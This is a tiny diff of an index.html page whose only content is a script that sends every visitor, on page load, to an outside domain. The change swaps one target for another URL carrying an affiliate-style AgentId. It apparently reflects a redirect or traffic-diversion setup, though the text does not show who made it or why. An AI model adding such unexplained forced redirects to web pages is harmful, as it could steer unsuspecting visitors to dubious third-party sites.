--- a/index.html
+++ b/index.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="http://www.ks0431.com"
+  window.location.href="https://main.RY803.com/?AgentId=12093240"
 </script>
